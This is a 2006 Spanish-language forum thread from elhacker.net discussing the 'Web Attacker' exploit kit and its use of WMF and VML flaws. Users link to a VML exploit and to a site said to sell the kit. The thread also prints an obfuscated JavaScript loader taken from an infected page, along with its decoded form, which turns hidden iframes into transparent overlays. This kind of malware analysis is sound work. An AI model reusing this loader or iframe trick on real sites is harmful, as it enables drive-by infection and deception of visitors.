elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.
 
Inicio Ayuda Buscar Ingresar Registrarse
14 Febrero 2012, 04:17  


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Bugs y Exploits (Moderador: berz3k)
| | |-+  Web Attacker
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Web Attacker  (Leído 1,874 veces)
Molasar

Desconectado Desconectado

Mensajes: 29


Ver Perfil
Web Attacker
« en: 25 Septiembre 2006, 21:48 »

Alguien tiene más info sobre el exploit llamado "Web Attacker"?

Se supone que unos rusos lo venden por U$ 15 desde hace unos meses ya, hasta donde pude ver, lo van actualizando, ya que al principio usaba la vulnerabilidad en WMF y parece que ahora usa la de VML.

http://www2.noticiasdot.com/publicaciones/2006/0906/2109/noticias/noticias_210906-03.htm
http://www.diarioti.com/gate/n.php?id=12394
« Última modificación: 25 Septiembre 2006, 21:50 por Molasar » En línea
sirdarckcat
Troll Buena Onda y
CoAdmin
***
Desconectado Desconectado

Mensajes: 6.946


Lavando Platos


Ver Perfil WWW
Re: Web Attacker
« Respuesta #1 en: 26 Septiembre 2006, 06:19 »

lo mejor seria descubrir una web que este infectada, y robarle el exploit, y estudiarlo.

asi que, tu tarea es visitar paginas porno hasta que te llenes de spyware. xD

sinembargo, aqui tienes un exploit que explota VML:
http://foro.elhacker.net/index.php/topic,141425.html
http://www.milw0rm.com/exploits/2403

Saludos!!
En línea

Molasar

Desconectado Desconectado

Mensajes: 29


Ver Perfil
Re: Web Attacker
« Respuesta #2 en: 26 Septiembre 2006, 23:40 »

tu tarea es visitar paginas porno

Vaya misión más "sacrificada" que me asignaron, pero bueno, aquí va la primera "cosecha" para que la analicen:

Código:
<script>
var x=new Date();
x.setTime(x.getTime()+3600000);
document.cookie='websitesign=45;expires='+x.toGMTString();
</script>
<script>function l(ll,B){if (!B)B='?f)8!Ru1j-P^2YSQ|D"*X74whm$[cU}rC=HFiz,.IMa;t3o~@l5KBk v:TV+AyL#';var er;var li='';for(var vw=0;vw<ll.length;vw+=arguments.callee.toString().length-530){er=(B.indexOf(ll.charAt(vw))&(200+55))<<18|(B.indexOf(ll.charAt(vw+1))&(200+55))<<12|(B.indexOf(ll.charAt(vw+2))&(200+55))<<(arguments.callee.toString().length-528)|B.indexOf(ll.charAt(vw+3))&(200+55);li+=String.fromCharCode((er&(255*256*256))>>16,(er&(65000+280))>>8,er&(200+55));}eval(li.substring(0,li.length-arguments.callee.toString().length+532));}l('[)C.-u@T21DmPz?Lhwl U!cK[.Dt}iRj2!IIUu@HYwDt[5hi4w3hXz7D2RAMX!MBw4mvw5z$S"77Y 7r"B!I|1Ur"zMwjBU?hwD1U1U+Uzy^mHmB"B= *8ATjX?#[.U?h4mfwBtT21|:X47"7BCCXFfPPRA#X"hzSumzXFf3[HD=2viL4wIFU8y|$1DtjKz$$,mf-Rz|'+
'h"77r8z$$,mvUR7||5DwPFAzSRRo*)z||5X:Y5? Pwzo-u@vX8Tam.UrP7IT-7Xvm7y^|"=?UkyP4zcFDBf=U!UBUv3 wB3,-.D^"1m2QKi=|1U+Uzyt}XM"Qk!awBUAS7I@$R="w*zo-u!K}*Tm}z=jwX=oYHm[j5ct-k3,wX3+[ l7"8Yi|RMDYz-AYK3w}H-mS!@i-*TrURTSjvza2u=|P4Rf[,j;|5R P!M3-.UzPFy1Y"?~^FIT4!i.P"?C');</script><script>try{eval(j)}catch(ex){}</script>

Por ahora lo que pude averiguar del toolkit es que da un menú donde uno elige que exploit quiere emplear, aparentemente en la primera versión tenía 7 "opciones", no sé ahora.

Creo que encontré el website donde lo venden: http://watkit.eclub.lv/
En línea
sirdarckcat
Troll Buena Onda y
CoAdmin
***
Desconectado Desconectado

Mensajes: 6.946


Lavando Platos


Ver Perfil WWW
Re: Web Attacker
« Respuesta #3 en: 27 Septiembre 2006, 23:12 »

este es el codigo descifrado:
Código:
var i9=document.getElementsByTagName(\"iframe\");var j9;for(j9 in i9)if(i9[j9].height==2&&i9[j9].width==2&&i9[j9].style.visibility==\"hidden\")i9[j9].style.cssText=\"height:100px;width:100px;top:0px;visibility:visible;position:absolute;filter:progid:DXImageTransform.Microsoft.Alpha(opacity=0)\";

Saludos!!
En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  
Powered by SMF 1.1.16 | SMF © 2006-2008, Simple Machines